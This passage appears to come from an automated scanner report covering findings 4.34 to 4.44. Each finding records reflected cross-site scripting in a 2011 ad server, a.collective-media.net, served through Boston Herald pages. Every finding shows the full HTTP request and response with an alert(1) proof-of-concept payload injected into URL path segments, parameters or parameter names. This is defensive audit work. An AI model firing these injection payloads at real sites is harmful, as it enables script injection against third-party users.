This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald654f4'-alert(1)-'850b1958677/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Sat, 29 Jan 2011 01:54:33 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:33 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald654f4'-alert(1)-'850b1958677/ent;sz=300x250;net=q1;ord=395221226?;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.34. http://a.collective-media.net/adj/q1.bosherald/ent [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/ent

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cab70'-alert(1)-'8ffc3938199 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/entcab70'-alert(1)-'8ffc3938199;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Sat, 29 Jan 2011 01:54:33 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:33 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/entcab70'-alert(1)-'8ffc3938199;sz=300x250;net=q1;ord=395221226?;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.35. http://a.collective-media.net/adj/q1.bosherald/ent [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/ent

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 657e3'-alert(1)-'1fd645b8ca3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226?&657e3'-alert(1)-'1fd645b8ca3=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Sat, 29 Jan 2011 01:54:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:30 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/ent;sz=300x250;net=q1;ord=395221226?&657e3'-alert(1)-'1fd645b8ca3=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.36. http://a.collective-media.net/adj/q1.bosherald/ent [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/ent

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f510'-alert(1)-'cca529e904d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226?7f510'-alert(1)-'cca529e904d HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Sat, 29 Jan 2011 01:54:25 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:25 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/ent;sz=300x250;net=q1;ord=395221226?7f510'-alert(1)-'cca529e904d;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.37. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9722d'-alert(1)-'1ce6f168cb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald9722d'-alert(1)-'1ce6f168cb/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:33 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:33 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald9722d'-alert(1)-'1ce6f168cb/ent_fr;sz=300x250;net=q1;ord=269011797?;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.38. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d8b5'-alert(1)-'bb4b3c0ab17 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/ent_fr8d8b5'-alert(1)-'bb4b3c0ab17;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Sat, 29 Jan 2011 01:54:33 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:33 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/ent_fr8d8b5'-alert(1)-'bb4b3c0ab17;sz=300x250;net=q1;ord=269011797?;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.39. http://a.collective-media.net/adj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/ent_fr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45fdb'-alert(1)-'f0e9ee952a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797?&45fdb'-alert(1)-'f0e9ee952a7=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Date: Sat, 29 Jan 2011 01:54:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:30 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=269011797?&45fdb'-alert(1)-'f0e9ee952a7=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.40. http://a.collective-media.net/adj/q1.bosherald/ent_fr [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/ent_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79143'-alert(1)-'f2c049340a8 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797?79143'-alert(1)-'f2c049340a8 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Sat, 29 Jan 2011 01:54:25 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:25 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=269011797?79143'-alert(1)-'f2c049340a8;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.41. http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 664cf'-alert(1)-'481295f49c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/uol.collective664cf'-alert(1)-'481295f49c3/ColeHaan_MM_Openness_CMN_13109;dcove=o;sz=300x250;click0=;ord=1655200? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 479
Date: Sat, 29 Jan 2011 01:54:36 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:36 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/uol.collective664cf'-alert(1)-'481295f49c3/ColeHaan_MM_Openness_CMN_13109;dcove=o;sz=300x250;net=uol;ord=1655200;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.42. http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d2bf'-alert(1)-'4f7eb27d456 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/uol.collective/ColeHaan_MM_Openness_CMN_131094d2bf'-alert(1)-'4f7eb27d456;dcove=o;sz=300x250;click0=;ord=1655200? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 479
Date: Sat, 29 Jan 2011 01:54:36 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:36 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_131094d2bf'-alert(1)-'4f7eb27d456;dcove=o;sz=300x250;net=uol;ord=1655200;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.43. http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [dcove parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The value of the dcove request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bfb42'-alert(1)-'55062673759 was submitted in the dcove parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/uol.collective/ColeHaan_MM_Openness_CMN_13109;dcove=o;sz=300x250;click0=;ord=1655200?bfb42'-alert(1)-'55062673759 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 480
Date: Sat, 29 Jan 2011 01:54:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:26 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109;dcove=o;sz=300x250;net=uol;ord=1655200?bfb42'-alert(1)-'55062673759;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.44. http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
